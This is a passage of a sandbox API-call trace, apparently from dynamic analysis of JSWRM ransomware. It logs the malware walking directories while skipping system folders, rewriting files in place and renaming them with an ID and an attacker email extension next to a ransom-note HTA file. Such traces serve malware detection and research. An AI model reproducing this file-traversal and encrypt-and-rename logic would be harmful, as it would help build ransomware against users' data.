lstrcmpiW (lpString1="eula.rtf", lpString2=".") returned 1 [0058.953] lstrcmpiW (lpString1="eula.rtf", lpString2="..") returned 1 [0058.953] lstrcmpiW (lpString1="eula.rtf", lpString2="...") returned 1 [0058.953] lstrcmpiW (lpString1="eula.rtf", lpString2="windows") returned -1 [0058.953] lstrcmpiW (lpString1="eula.rtf", lpString2="recovery") returned -1 [0058.953] lstrcmpiW (lpString1="eula.rtf", lpString2="perflogs") returned -1 [0058.953] lstrcmpiW (lpString1="eula.rtf", lpString2="documents and settings") returned 1 [0058.953] lstrcmpiW (lpString1="eula.rtf", lpString2="$RECYCLE.BIN") returned 1 [0058.953] lstrcmpiW (lpString1="eula.rtf", lpString2="system volume information") returned -1 [0058.953] lstrcmpiW (lpString1="eula.rtf", lpString2="msocache") returned -1 [0058.953] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241038 [0058.953] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="eula.rtf", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0058.953] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="eula.rtf", cchWideChar=8, lpMultiByteStr=0x345f610, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eula.rtf", lpUsedDefaultChar=0x0) returned 8 [0058.953] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241038 | out: hHeap=0x1e0000) returned 1 [0058.953] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0058.953] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="eula.rtf", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0058.953] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="eula.rtf", cchWideChar=8, lpMultiByteStr=0x345f5e0, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eula.rtf", lpUsedDefaultChar=0x0) returned 8 [0058.953] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0058.953] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c488 [0058.953] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e418 | out: hHeap=0x1e0000) returned 1 [0058.953] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0058.953] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345f334, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0058.953] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c380 [0058.953] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1035\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1035\\eula.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3d4 [0058.953] GetFileSizeEx (in: hFile=0x3d4, lpFileSize=0x345f2c8 | out: lpFileSize=0x345f2c8*=3702) returned 1 [0058.953] SetFilePointer (in: hFile=0x3d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0058.953] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe70) returned 0x23dc88 [0058.953] ReadFile (in: hFile=0x3d4, lpBuffer=0x23dc88, nNumberOfBytesToRead=0xe70, lpNumberOfBytesRead=0x345f2d4, lpOverlapped=0x0 | out: lpBuffer=0x23dc88*, lpNumberOfBytesRead=0x345f2d4*=0xe70, lpOverlapped=0x0) returned 1 [0058.955] SetFilePointer (in: hFile=0x3d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0058.955] WriteFile (in: hFile=0x3d4, lpBuffer=0x23dc88*, nNumberOfBytesToWrite=0xe70, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x23dc88*, lpNumberOfBytesWritten=0x345f2d0*=0xe70, lpOverlapped=0x0) returned 1 [0058.955] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dc88 | out: hHeap=0x1e0000) returned 1 [0058.955] CloseHandle (hObject=0x3d4) returned 1 [0058.956] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c068 [0058.956] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0058.956] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d4c8 [0058.956] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d4c8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0058.956] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d458 [0058.956] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d4c8 | out: hHeap=0x1e0000) returned 1 [0058.956] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0058.956] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a348 [0058.956] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a348, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0058.956] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a348 | out: hHeap=0x1e0000) returned 1 [0058.956] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232db8 [0058.956] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x8e) returned 0x23b400 [0058.956] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232db8 | out: hHeap=0x1e0000) returned 1 [0058.956] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd4) returned 0x1fc808 [0058.956] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0058.956] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d458 | out: hHeap=0x1e0000) returned 1 [0058.956] MoveFileW (lpExistingFileName="C:\\588bce7c90097ed212\\1035\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1035\\eula.rtf"), lpNewFileName="C:\\588bce7c90097ed212\\1035\\eula.rtf.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\588bce7c90097ed212\\1035\\eula.rtf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0058.957] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0058.957] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c068 | out: hHeap=0x1e0000) returned 1 [0058.957] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c380 | out: hHeap=0x1e0000) returned 1 [0058.957] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x19cafc46, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x19cafc46, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x19cd5c2a, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x60002, dwReserved1=0x20e44c, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0058.957] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0058.957] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0058.957] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0058.957] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0058.957] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0058.957] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0058.957] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0058.957] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0058.957] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0058.957] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0058.957] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d458 [0058.957] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0058.957] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0058.957] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x240ef8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0058.957] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d458 | out: hHeap=0x1e0000) returned 1 [0058.957] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d4c8 [0058.957] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0058.957] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241038 [0058.957] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241038, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0058.957] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d4c8 | out: hHeap=0x1e0000) returned 1 [0058.957] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232c80 [0058.957] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c488 | out: hHeap=0x1e0000) returned 1 [0058.957] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241038 | out: hHeap=0x1e0000) returned 1 [0058.957] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0058.957] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x12cde, dwReserved0=0x60002, dwReserved1=0x20e44c, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0058.957] lstrcmpiW (lpString1="LocalizedData.xml", lpString2=".") returned 1 [0058.958] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="..") returned 1 [0058.958] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="...") returned 1 [0058.958] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="windows") returned -1 [0058.958] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="recovery") returned -1 [0058.958] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="perflogs") returned -1 [0058.958] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="documents and settings") returned 1 [0058.958] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="$RECYCLE.BIN") returned 1 [0058.958] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="system volume information") returned -1 [0058.958] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="msocache") returned -1 [0058.958] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d490 [0058.958] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LocalizedData.xml", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0058.958] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0058.958] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LocalizedData.xml", cchWideChar=17, lpMultiByteStr=0x2412e0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LocalizedData.xml", lpUsedDefaultChar=0x0) returned 17 [0058.958] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d490 | out: hHeap=0x1e0000) returned 1 [0058.958] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d458 [0058.958] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LocalizedData.xml", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0058.958] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0058.958] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LocalizedData.xml", cchWideChar=17, lpMultiByteStr=0x241268, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LocalizedData.xml", lpUsedDefaultChar=0x0) returned 17 [0058.958] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d458 | out: hHeap=0x1e0000) returned 1 [0058.958] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232db8 [0058.958] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232c80 | out: hHeap=0x1e0000) returned 1 [0058.958] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0058.958] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345f334, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0058.958] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232e20 [0058.958] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1035\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1035\\localizeddata.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3d4 [0058.958] GetFileSizeEx (in: hFile=0x3d4, lpFileSize=0x345f2c8 | out: lpFileSize=0x345f2c8*=77022) returned 1 [0058.958] SetFilePointer (in: hFile=0x3d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0058.958] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x12cd0) returned 0x2471a8 [0058.958] ReadFile (in: hFile=0x3d4, lpBuffer=0x2471a8, nNumberOfBytesToRead=0x12cd0, lpNumberOfBytesRead=0x345f2d4, lpOverlapped=0x0 | out: lpBuffer=0x2471a8*, lpNumberOfBytesRead=0x345f2d4*=0x12cd0, lpOverlapped=0x0) returned 1 [0059.128] SetFilePointer (in: hFile=0x3d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0059.129] WriteFile (in: hFile=0x3d4, lpBuffer=0x2471a8*, nNumberOfBytesToWrite=0x12cd0, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2471a8*, lpNumberOfBytesWritten=0x345f2d0*=0x12cd0, lpOverlapped=0x0) returned 1 [0059.129] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471a8 | out: hHeap=0x1e0000) returned 1 [0059.130] CloseHandle (hObject=0x3d4) returned 1 [0059.132] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232ef0 [0059.132] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0059.132] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d4c8 [0059.132] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d4c8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0059.132] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d458 [0059.132] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d4c8 | out: hHeap=0x1e0000) returned 1 [0059.132] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0059.132] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a420 [0059.132] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a420, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0059.132] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a420 | out: hHeap=0x1e0000) returned 1 [0059.132] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x23a120 [0059.132] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa6) returned 0x216f90 [0059.132] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a120 | out: hHeap=0x1e0000) returned 1 [0059.132] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xf8) returned 0x20e550 [0059.132] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x216f90 | out: hHeap=0x1e0000) returned 1 [0059.132] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d458 | out: hHeap=0x1e0000) returned 1 [0059.132] MoveFileW (lpExistingFileName="C:\\588bce7c90097ed212\\1035\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1035\\localizeddata.xml"), lpNewFileName="C:\\588bce7c90097ed212\\1035\\LocalizedData.xml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\588bce7c90097ed212\\1035\\localizeddata.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0059.133] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e550 | out: hHeap=0x1e0000) returned 1 [0059.133] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232ef0 | out: hHeap=0x1e0000) returned 1 [0059.133] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232e20 | out: hHeap=0x1e0000) returned 1 [0059.133] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0059.133] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0059.133] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4758, dwReserved0=0x60002, dwReserved1=0x20e44c, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0059.133] lstrcmpiW (lpString1="SetupResources.dll", lpString2=".") returned 1 [0059.133] lstrcmpiW (lpString1="SetupResources.dll", lpString2="..") returned 1 [0059.133] lstrcmpiW (lpString1="SetupResources.dll", lpString2="...") returned 1 [0059.133] lstrcmpiW (lpString1="SetupResources.dll", lpString2="windows") returned -1 [0059.133] lstrcmpiW (lpString1="SetupResources.dll", lpString2="recovery") returned 1 [0059.133] lstrcmpiW (lpString1="SetupResources.dll", lpString2="perflogs") returned 1 [0059.133] lstrcmpiW (lpString1="SetupResources.dll", lpString2="documents and settings") returned 1 [0059.133] lstrcmpiW (lpString1="SetupResources.dll", lpString2="$RECYCLE.BIN") returned 1 [0059.133] lstrcmpiW (lpString1="SetupResources.dll", lpString2="system volume information") returned -1 [0059.134] lstrcmpiW (lpString1="SetupResources.dll", lpString2="msocache") returned 1 [0059.134] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d458 [0059.134] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SetupResources.dll", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0059.134] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0059.134] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SetupResources.dll", cchWideChar=18, lpMultiByteStr=0x2411c8, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SetupResources.dll", lpUsedDefaultChar=0x0) returned 18 [0059.134] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d458 | out: hHeap=0x1e0000) returned 1 [0059.134] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d458 [0059.134] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SetupResources.dll", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0059.134] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0059.134] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SetupResources.dll", cchWideChar=18, lpMultiByteStr=0x241010, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SetupResources.dll", lpUsedDefaultChar=0x0) returned 18 [0059.134] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d458 | out: hHeap=0x1e0000) returned 1 [0059.134] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232e20 [0059.134] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232db8 | out: hHeap=0x1e0000) returned 1 [0059.134] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0059.134] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0059.134] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4758, dwReserved0=0x60002, dwReserved1=0x20e44c, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0059.134] FindClose (in: hFindFile=0x231d40 | out: hFindFile=0x231d40) returned 1 [0059.134] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232e20 | out: hHeap=0x1e0000) returned 1 [0059.134] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e268 | out: hHeap=0x1e0000) returned 1 [0059.134] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20de78 | out: hHeap=0x1e0000) returned 1 [0059.134] FindNextFileW (in: hFindFile=0x2321c0, lpFindFileData=0x345f6c8 | out: lpFindFileData=0x345f6c8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfffffffe, dwReserved1=0x345f828, cFileName="1036", cAlternateFileName="")) returned 1 [0059.134] lstrcmpiW (lpString1="1036", lpString2=".") returned 1 [0059.134] lstrcmpiW (lpString1="1036", lpString2="..") returned 1 [0059.134] lstrcmpiW (lpString1="1036", lpString2="...") returned 1 [0059.134] lstrcmpiW (lpString1="1036", lpString2="windows") returned -1 [0059.134] lstrcmpiW (lpString1="1036", lpString2="recovery") returned -1 [0059.135] lstrcmpiW (lpString1="1036", lpString2="perflogs") returned -1 [0059.135] lstrcmpiW (lpString1="1036", lpString2="documents and settings") returned -1 [0059.135] lstrcmpiW (lpString1="1036", lpString2="$RECYCLE.BIN") returned 1 [0059.135] lstrcmpiW (lpString1="1036", lpString2="system volume information") returned -1 [0059.135] lstrcmpiW (lpString1="1036", lpString2="msocache") returned -1 [0059.135] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e268 [0059.135] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0059.135] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0059.135] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22bf08 [0059.135] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x76) returned 0x225b30 [0059.135] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bf08 | out: hHeap=0x1e0000) returned 1 [0059.135] GetFileAttributesW 